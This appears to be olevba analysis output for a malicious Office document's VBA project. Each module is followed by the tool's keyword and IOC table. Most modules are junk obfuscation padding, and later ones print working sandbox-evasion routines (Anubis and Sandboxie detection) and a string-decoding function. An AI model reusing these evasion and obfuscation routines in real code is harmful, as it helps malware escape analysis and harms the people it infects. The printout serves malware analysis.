Private Sub xcOlabrueiDsqqpSLOranNVQrnAoEDtOYTovB()

Dim ocgNBLamvb As Integer
ocgNBLamvb = 9:
Do While ocgNBLamvb < 7
   DoEvents: ocgNBLamvb = ocgNBLamvb + 1
Loop

GoTo ZKChkioXxI
ZKChkioXxI:

If "nzQemcGptO" = "EbCBdWsWly" Then End

Dim zbcyLlHFZj As Integer
zbcyLlHFZj = 1:
Do While zbcyLlHFZj < 28
   DoEvents: zbcyLlHFZj = zbcyLlHFZj + 1
Loop

End Sub

Private Function EJaatNBMSZQyrtgBZWfEpampntVcNOsxVjrBL()

If "KKjMeBetAo" = "jLHtBXPGhr" Then End

GoTo IPuFlFyMXw
IPuFlFyMXw:

Dim KDFSFkhRpa As Integer
KDFSFkhRpa = 10:
Do While KDFSFkhRpa < 17
   DoEvents: KDFSFkhRpa = KDFSFkhRpa + 1
Loop

If "SYgnysXJGV" = "WMWZDxnSsr" Then End

End Function

Private Function RDGjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQ()

GoTo CUZCAGoWAa
CUZCAGoWAa:

If "oDEuxHLGWt" = "tTvORVDqQY" Then End

Dim qDrgfwRBwr As Integer
qDrgfwRBwr = 3:
Do While qDrgfwRBwr < 14
   DoEvents: qDrgfwRBwr = qDrgfwRBwr + 1
Loop

If "VoocgNBLam" = "vbvURaZKCh" Then End

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module4.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Function kuCVoCNmBRATVIVBxHfqCOKIOWEoiNyWLMcmP()

Dim NnmPaEhXdD As Long
NnmPaEhXdD = "7864":

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module5.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub zDmqLByyYBTpTivowYzvIwMECWgbwEJaatNBM()

Dim buwjdcziHs As Long
buwjdcziHs = "8519":

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module6.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Function SZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJ()

GoTo SyYGIjFrZv
SyYGIjFrZv:

Dim fQEgnsDKdw As Integer
fQEgnsDKdw = 6:
Do While fQEgnsDKdw < 6
   DoEvents: fQEgnsDKdw = fQEgnsDKdw + 1
Loop

Dim JbbdqdJGPn As Long
JbbdqdJGPn = "5222":

Dim wsqWeMXqvH As Integer
wsqWeMXqvH = 8:
Do While wsqWeMXqvH < 16
   DoEvents: wsqWeMXqvH = wsqWeMXqvH + 1
Loop

GoTo kuxbWMqqQs
kuxbWMqqQs:

GoTo hLAggoQrnA
hLAggoQrnA:

End Function

Private Sub GculmwLnUsKqddRVCpzPbKXkQNWnyqWZXDlTw()

GoTo NbcTWfjeUS
NbcTWfjeUS:

Dim RtMpTbPowr As Integer
RtMpTbPowr = 1:
Do While RtMpTbPowr < 1
   DoEvents: RtMpTbPowr = RtMpTbPowr + 1
Loop

If "pFEVpkQXCt" = "tNNaFlzJZL" Then End

If "UspyXiaGJH" = "mVvgHMxODk" Then End

If "OSmcAazCuR" = "ujXQYeXjYn" Then End

Dim DxIDyfkCbv As Integer
DxIDyfkCbv = 2:
Do While DxIDyfkCbv < 29
   DoEvents: DxIDyfkCbv = DxIDyfkCbv + 1
Loop

End Sub

Public Sub MSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHg()

GoTo nefQEgnsDK
nefQEgnsDK:

Dim wkvVJbbdqd As Long
wkvVJbbdqd = "6334":

If "PnZKwsqWeM" = "XqvHetukux" Then End

Dim WMqqQsEhLA As Long
WMqqQsEhLA = "8220":

GoTo oQrnAhEWNO
oQrnAhEWNO:

Dim mPvUlSFFsX As Long
mPvUlSFFsX = "6710":

End Sub

Public Function pzPbKXkQNWnyqWZXDlTwxcOlabrueiDsqqpSL()

Dim PowrToBpFE As Integer
PowrToBpFE = 1:
Do While PowrToBpFE < 6
   DoEvents: PowrToBpFE = PowrToBpFE + 1
Loop

Dim uQXCttNNaF As Integer
uQXCttNNaF = 8:
Do While uQXCttNNaF < 22
   DoEvents: uQXCttNNaF = uQXCttNNaF + 1
Loop

Dim ZLUAUspyXi As Long
ZLUAUspyXi = "1337":

If "JHmVvgHMxO" = "DkBEOSmcAa" Then End

Dim CuRujXQYeX As Integer
CuRujXQYeX = 5:
Do While CuRujXQYeX < 2
   DoEvents: CuRujXQYeX = CuRujXQYeX + 1
Loop

Dim fDxIDyfkCb As Integer
fDxIDyfkCb = 3:
Do While fDxIDyfkCb < 16
   DoEvents: fDxIDyfkCb = fDxIDyfkCb + 1
Loop

End Function

Private Function BMSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHH()

Dim ZDSyYGIjFr As Long
ZDSyYGIjFr = "8466":

Dim dwkvVJbbdq As Integer
dwkvVJbbdq = 5:
Do While dwkvVJbbdq < 19
   DoEvents: dwkvVJbbdq = dwkvVJbbdq + 1
Loop

Dim bWMqqQsEhL As Long
bWMqqQsEhL = "8843":

Dim goQrnAhEWN As Long
goQrnAhEWN = "2337":

Dim DRBqclylrO As Long
DRBqclylrO = "2721":

If "aSxayeNuYZ" = "dpNbcTWfje" Then End

End Function

Private Sub sqqpSLOranNVQrnAoEDtOYTovBSSllZdKxIXj()

If "spyXiaGJHm" = "VvgHMxODkB" Then End

Dim voCNtarATV As Long
voCNtarATV = "4335":

Dim YHfRbORPVw As Integer
YHfRbORPVw = 8:
Do While YHfRbORPVw < 10
   DoEvents: YHfRbORPVw = YHfRbORPVw + 1
Loop

GoTo UZwLTcmWTO
UZwLTcmWTO:

If "IihKcZDSyY" = "GIjFrZvnef" Then End

GoTo EgnsDKdwkv
EgnsDKdwkv:

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module8.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Sub XMNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkX()

Dim IwGvhqdRwt As Integer
IwGvhqdRwt = 1:
Do While IwGvhqdRwt < 26
   DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
Loop

Dim xcfEjSzdEJ As Long
xcfEjSzdEJ = "2523":

If "ghYBkPjzXX" = "wZrVygUtbw" Then End

Dim UgVKJAueAv As Integer
UgVKJAueAv = 6:
Do While UgVKJAueAv < 28
   DoEvents: UgVKJAueAv = UgVKJAueAv + 1
Loop

Dim ySsGKqeoEQ As Integer
ySsGKqeoEQ = 10:
Do While ySsGKqeoEQ < 23
   DoEvents: ySsGKqeoEQ = ySsGKqeoEQ + 1
Loop

Dim xuEcOfLOMS As Integer
xuEcOfLOMS = 10:
Do While xuEcOfLOMS < 22
   DoEvents: xuEcOfLOMS = xuEcOfLOMS + 1
Loop

Dim mRDtIQGjTX As Integer
mRDtIQGjTX = 5:
Do While mRDtIQGjTX < 28
   DoEvents: mRDtIQGjTX = mRDtIQGjTX + 1
Loop

Dim feHLncVDFg As Long
feHLncVDFg = "3899":

Dim DskicNIdkp As Integer
DskicNIdkp = 10:
Do While DskicNIdkp < 28
   DoEvents: DskicNIdkp = DskicNIdkp + 1
Loop

End Sub

Private Function OHuGMTKslnBuTQZxjUgjhnPWHImrPEluFolgW()

Dim pIeIXdDlNo As Integer
pIeIXdDlNo = 5:
Do While pIeIXdDlNo < 16
   DoEvents: pIeIXdDlNo = pIeIXdDlNo + 1
Loop

GoTo aTjLVjlsYi
aTjLVjlsYi:

If "iCpaAOFngi" = "viOLuTEPbx" Then End

Dim bKrCWamKyz As Long
bKrCWamKyz = "6521":

If "cgbRvWVxJm" = "QfMltvwsFm" Then End

Dim BSTdrUBZqx As Long
BSTdrUBZqx = "3405":

If "xCIwGvhqdR" = "wtcUfxcfEj" Then End

Dim zdEJuSghYB As Integer
zdEJuSghYB = 9:
Do While zdEJuSghYB < 24
   DoEvents: zdEJuSghYB = zdEJuSghYB + 1
Loop

If "zXXwZrVygU" = "tbwYUgVKJA" Then End

End Function

Private Sub ISNipuMMfGTxESCRdmSmLIRpbTYbZfnOyzeQH()

Dim jTXrhFfeHL As Long
jTXrhFfeHL = "5576":

If "DFgCoDskic" = "NIdkpHHatH" Then End

Dim GwFYANhGDM As Long
GwFYANhGDM = "7273":

Dim HTWUAbJUuZ As Integer
HTWUAbJUuZ = 5:
Do While HTWUAbJUuZ < 22
   DoEvents: HTWUAbJUuZ = HTWUAbJUuZ + 1
Loop

GoTo YhrByTJnnN
YhrByTJnnN:

GoTo IeIXdDlNok
IeIXdDlNok:

GoTo eaTjLVjlsY
eaTjLVjlsY:

Dim vbKrCWamKy As Long
vbKrCWamKy = "9276":

GoTo JBSTdrUBZq
JBSTdrUBZq:

End Sub

Public Function kXXLPvjtJVEReKHQhTLQTRXfNqrWIfUVloYcw()

If "wZrVygUtbw" = "YUgVKJAueA" Then End

GoTo ChZySsGKqe
ChZySsGKqe:

Dim QZFZxuEcOf As Integer
QZFZxuEcOf = 5:
Do While QZFZxuEcOf < 9
   DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
Loop

If "aBlmRDtIQG" = "jTXrhFfeHL" Then End

Dim PcVDFgCoDs As Long
PcVDFgCoDs = "8147":

Dim cNIdkpHHat As Long
cNIdkpHHat = "3146":

Dim yGwFYANhGD As Integer
yGwFYANhGD = 9:
Do While yGwFYANhGD < 23
   DoEvents: yGwFYANhGD = yGwFYANhGD + 1
Loop

If "HTWUAbJUuZ" = "EbqYhrByTJ" Then End

GoTo nNpIeIXdDl
nNpIeIXdDl:

End Function

Private Sub aCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcPLJ()

GoTo CWamKyzpAc
CWamKyzpAc:

GoTo bRvWVxJmQf
bRvWVxJmQf:

If "ltvwsFmJBS" = "TdrUBZqxKK" Then End

Dim CIwGvhqdRw As Long
CIwGvhqdRw = "7156":

GoTo UfxcfEjSzd
UfxcfEjSzd:

Dim JuSghYBkPj As Integer
JuSghYBkPj = 8:
Do While JuSghYBkPj < 6
   DoEvents: JuSghYBkPj = JuSghYBkPj + 1
Loop

If "wZrVygUtbw" = "YUgVKJAueA" Then End

GoTo oEQZFZxuEc
oEQZFZxuEc:

Dim OMSaBlmRDt As Integer
OMSaBlmRDt = 4:
Do While OMSaBlmRDt < 29
   DoEvents: OMSaBlmRDt = OMSaBlmRDt + 1
Loop

End Sub

Private Function twgkFVssSuNjNcpiqStpCqGxvQavRxDUUOHuG()

Dim FYANhGDMkW As Integer
FYANhGDMkW = 1:
Do While FYANhGDMkW < 15
   DoEvents: FYANhGDMkW = FYANhGDMkW + 1
Loop

Dim UAbJUuZEbq As Integer
UAbJUuZEbq = 8:
Do While UAbJUuZEbq < 19
   DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
Loop

GoTo ByTJnnNpIe
ByTJnnNpIe:

GoTo XdDlNokXea
XdDlNokXea:

Dim jLVjlsYiPi As Integer
jLVjlsYiPi = 2:
Do While jLVjlsYiPi < 20
   DoEvents: jLVjlsYiPi = jLVjlsYiPi + 1
Loop

GoTo AOFngiviOL
AOFngiviOL:

GoTo EPbxvbKrCW
EPbxvbKrCW:

GoTo mKyzpAcgbR
mKyzpAcgbR:

Dim WVxJmQfMlt As Long
WVxJmQfMlt = "2151":

End Function

Public Function KGsaWofgqFhOmEkXXLPvjtJVEReKHQhTLQTRX()

Dim ueAvChZySs As Integer
ueAvChZySs = 6:
Do While ueAvChZySs < 14
   DoEvents: ueAvChZySs = ueAvChZySs + 1
Loop

Dim eoEQZFZxuE As Long
eoEQZFZxuE = "6270":

GoTo fLOMSaBlmR
fLOMSaBlmR:

GoTo tIQGjTXrhF
tIQGjTXrhF:

Dim eHLncVDFgC As Integer
eHLncVDFgC = 3:
Do While eHLncVDFgC < 7
   DoEvents: eHLncVDFgC = eHLncVDFgC + 1
Loop

GoTo kicNIdkpHH
kicNIdkpHH:

If "HsyGwFYANh" = "GDMkWHTWUA" Then End

GoTo UuZEbqYhrB
UuZEbqYhrB:

Dim TJnnNpIeIX As Long
TJnnNpIeIX = "5651":

End Function

Private Function qyaCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcP()

GoTo gbRvWVxJmQ
gbRvWVxJmQ:

If "MltvwsFmJB" = "STdrUBZqxK" Then End

Dim SzdEJuSghY As Integer
SzdEJuSghY = 2:
Do While SzdEJuSghY < 14
   DoEvents: SzdEJuSghY = SzdEJuSghY + 1
Loop

GoTo jzXXwZrVyg
jzXXwZrVyg:

GoTo GKqeoEQZFZ
GKqeoEQZFZ:

If "uEcOfLOMSa" = "BlmRDtIQGj" Then End

GoTo rhFfeHLncV
rhFfeHLncV:

If "FgCoDskicN" = "IdkpHHatHs" Then End

If "GwFYANhGDM" = "kWHTWUAbJU" Then End

End Function

Public Function ImrPEluFolgWBBaDVrVkRqyaCxKrOGXYiwZGL()

Dim CpaAOFngiv As Integer
CpaAOFngiv = 3:
Do While CpaAOFngiv < 24
   DoEvents: CpaAOFngiv = CpaAOFngiv + 1
Loop

GoTo amKyzpAcgb
amKyzpAcgb:

If "vWVxJmQfMl" = "tvwsFmJBST" Then End

GoTo rUBZqxKKxC
rUBZqxKKxC:

Dim wGvhqdRwtc As Long
wGvhqdRwtc = "9280":

Dim uSghYBkPjz As Integer
uSghYBkPjz = 6:
Do While uSghYBkPjz < 21
   DoEvents: uSghYBkPjz = uSghYBkPjz + 1
Loop

If "ZrVygUtbwY" = "UgVKJAueAv" Then End

Dim hZySsGKqeo As Long
hZySsGKqeo = "7148":

If "ZFZxuEcOfL" = "OMSaBlmRDt" Then End

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module9.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Function GjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQNW()

If "xayeNuYZdp" = "NbcTWfjeUS" Then End

Dim RtMpTbPowr As Integer
RtMpTbPowr = 1:
Do While RtMpTbPowr < 1
   DoEvents: RtMpTbPowr = RtMpTbPowr + 1
Loop

If "pFEVpkQXCt" = "tNNaFlzJZL" Then End

If "UspyXiaGJH" = "mVvgHMxODk" Then End

If "OSmcAazCuR" = "ujXQYeXjYn" Then End

End Function

Public Sub ECWgbwEJaatNBMSZQyrtgBZWfEpampntVcNOs()

GoTo cmWTOdIihK
cmWTOdIihK:

GoTo ZDSyYGIjFr
ZDSyYGIjFr:

Dim vnefQEgnsD As Integer
vnefQEgnsD = 8:
Do While vnefQEgnsD < 23
   DoEvents: vnefQEgnsD = vnefQEgnsD + 1
Loop

Dim kvVJbbdqdJ As Long
kvVJbbdqdJ = "7718":

Dim nZKwsqWeMX As Long
nZKwsqWeMX = "3470":

End Sub

Private Sub UGdSsJTvAukPpoRDGjyfFNoQMYGculmwLnUsK()

Dim sXDRBqclyl As Long
sXDRBqclyl = "7338":

Dim PaSxayeNuY As Integer
PaSxayeNuY = 0:
Do While PaSxayeNuY < 13
   DoEvents: PaSxayeNuY = PaSxayeNuY + 1
Loop

Dim bcTWfjeUSS As Integer
bcTWfjeUSS = 8:
Do While bcTWfjeUSS < 22
   DoEvents: bcTWfjeUSS = bcTWfjeUSS + 1
Loop

If "pTbPowrToB" = "pFEVpkQXCt" Then End

Dim NNaFlzJZLU As Integer
NNaFlzJZLU = 7:
Do While NNaFlzJZLU < 21
   DoEvents: NNaFlzJZLU = NNaFlzJZLU + 1
Loop

End Sub

Private Sub ROXvhZehfltUFGkWmbjzDmqLByyYBTpTivowY()

If "YnfDxIDyfk" = "CbvoCNtarA" Then End

Dim ICBYHfRbOR As Long
ICBYHfRbOR = "95":

GoTo wEopUZwLTc
wEopUZwLTc:

GoTo TOdIihKcZD
TOdIihKcZD:

If "yYGIjFrZvn" = "efQEgnsDKd" Then End

End Sub

Private Sub VJUthYHACPChenmxiuRPudkVPUGdSsJTvAukP()

Dim EhLAggoQrn As Integer
EhLAggoQrn = 7:
Do While EhLAggoQrn < 4
   DoEvents: EhLAggoQrn = EhLAggoQrn + 1
Loop

Dim WNOYmPvUlS As Long
WNOYmPvUlS = "4971":

If "sXDRBqclyl" = "rOxPaSxaye" Then End

If "ZdpNbcTWfj" = "eUSSRtMpTb" Then End

Dim owrToBpFEV As Long
owrToBpFEV = "3340":

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO sdfdsf.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfdsf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Declare Function GetVolumeInformation Lib "kernel32.dll" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long

Function IsAnubisPresent(ByVal OptionToCheck As Integer) As Boolean
   On Error Resume Next
   Set WShell = CreateObject("WScript.Shell")

   Select Case OptionToCheck
       Case 1
           If GetSerialNumber(Environ("SystemDrive") & "\") = "1824245000" Then
               IsAnubisPresent = True
           Else
               IsAnubisPresent = False
           End If
       Case 2
           If WShell.RedRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId") = "76487-337-8429955-22614" Then
               IsAnubisPresent = True
           Else
               IsAnubisPresent = False
           End If
       Case 3
           If UCase(App.EXEName) = "SAMPLE" Then
               IsAnubisPresent = True
           Else
               IsAnubisPresent = False
           End If
       Case 4
           If UCase(Environ("USERNAME")) = "USER" Then
               IsAnubisPresent = True
           Else
               IsAnubisPresent = False
           End If
   End Select
End Function

Public Function GetSerialNumber(DriveLetter As String) As Long
   Buffer1 = String$(255, Chr$(0))
   Buffer2 = String$(255, Chr$(0))
   Res = GetVolumeInformation(DriveLetter, Buffer1, Len(Buffer1), SerialNum, 0, 0, Buffer2, Len(Buffer2))
   GetSerialNumber = SerialNum
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Shell          | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | WScript.Shell  | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | Environ        | May read system environment variables   |
| Suspicious | Windows        | May enumerate application windows (if   |
|            |                | combined with Shell.Application object) |
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | kernel32.dll   | Executable file name                    |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO sdfsdfsdf.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long

Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long

           hSbie = GetModuleHandle("SbieDll.dll")
           If hSbie <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
   End Select
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | SbieDll.dll    | Executable file name                    |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO sdfsdfsdffff.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdffff'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Function MkSrpQP(ByVal strData As String, ByVal strKey As String)
Dim bData() As Byte
Dim cSIQhPPCpQ As Integer
For cSIQhPPCpQ = 0 To 0
If cSIQhPPCpQ = 5 Then End
Next cSIQhPPCpQ
Dim BGOEkt As Integer
For BGOEkt = 0 To 0
If BGOEkt = 5 Then End
Next BGOEkt
Dim bKey() As Byte
Dim mCDZb As Integer
For mCDZb = 0 To 0
If mCDZb = 5 Then End
Next mCDZb
Dim hDCeLdOSt As Integer
For hDCeLdOSt = 0 To 0
If hDCeLdOSt = 5 Then End
Next hDCeLdOSt
bData = StrConv(strData, vbFromUnicode)
Dim iALAxrJGeN As Integer
For iALAxrJGeN = 0 To 0
If iALAxrJGeN = 5 Then End
Next iALAxrJGeN
Dim DCeLdO As Integer
For DCeLdO = 0 To 0
If DCeLdO = 5 Then End
Next DCeLdO
bKey = StrConv(strKey, vbFromUnicode)
Dim sGQzzmmNQKfJiAL As Integer
For sGQzzmmNQKfJiAL = 0 To 0
If sGQzzmmNQKfJiAL = 5 Then End
Next sGQzzmmNQKfJiAL
Dim tSeZqoKgExtE As Integer
For tSeZqoKgExtE = 0 To 0
If tSeZqoKgExtE = 5 Then End
Next tSeZqoKgExtE
For i = 0 To UBound(bData)
Dim MLQBuBgGsI As Integer
For MLQBuBgGsI = 0 To 0
If MLQBuBgGsI = 5 Then End
Next MLQBuBgGsI
Dim PRyEYg As Integer
For PRyEYg = 0 To 0
If PRyEYg = 5 Then End
Next PRyEYg
If i <= UBound(bKey) Then
Dim zAhBGOEktusx As Integer
For zAhBGOEktusx = 0 To 0
If zAhBGOEktusx = 5 Then End
Next zAhBGOEktusx
Dim QSHcSIQ As Integer
For QSHcSIQ = 0 To 0
If QSHcSIQ = 5 Then End
Next QSHcSIQ
bData(i) = bData(i) - bKey(i)
Dim ALAxrJ As Integer
For ALAxrJ = 0 To 0
If ALAxrJ = 5 Then End
Next ALAxrJ
Dim DbVzAhBG As Integer
For DbVzAhBG = 0 To 0
If DbVzAhBG = 5 Then End
Next DbVzAhBG
Else
Dim ddchRKRwJIZc As Integer
For ddchRKRwJIZc = 0 To 0
If ddchRKRwJIZc = 5 Then End
Next ddchRKRwJIZc
Dim vSNrta As Integer
For vSNrta = 0 To 0
If vSNrta = 5 Then End
Next vSNrta
bData(i) = bData(i) - bKey(i Mod UBound(bKey))
Dim aeEspjB As Integer
For aeEspjB = 0 To 0
If aeEspjB = 5 Then End
Next aeEspjB
Dim ZhuVqUtK As Integer
For ZhuVqUtK = 0 To 0
If ZhuVqUtK = 5 Then End
Next ZhuVqUtK
End If
Dim pQoae As Integer
For pQoae = 0 To 0
If pQoae = 5 Then End
Next pQoae
Dim xxZhuVqUtKlL As Integer
For xxZhuVqUtKlL = 0 To 0
If xxZhuVqUtKlL = 5 Then End
Next xxZhuVqUtKlL
Next i
Dim spjBzVrPV As Integer
For spjBzVrPV = 0 To 0
If spjBzVrPV = 5 Then End
Next spjBzVrPV
Dim PkMRfcKYxxZ As Integer
For PkMRfcKYxxZ = 0 To 0
If PkMRfcKYxxZ = 5 Then End
Next PkMRfcKYxxZ
 MkSrpQP = StrConv(bData, vbUnicode)
Dim QScmhKas As Integer
For QScmhKas = 0 To 0
If QScmhKas = 5 Then End
Next QScmhKas
Dim xNdkmv As Integer
For xNdkmv = 0 To 0
If xNdkmv = 5 Then End
Next xNdkmv
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.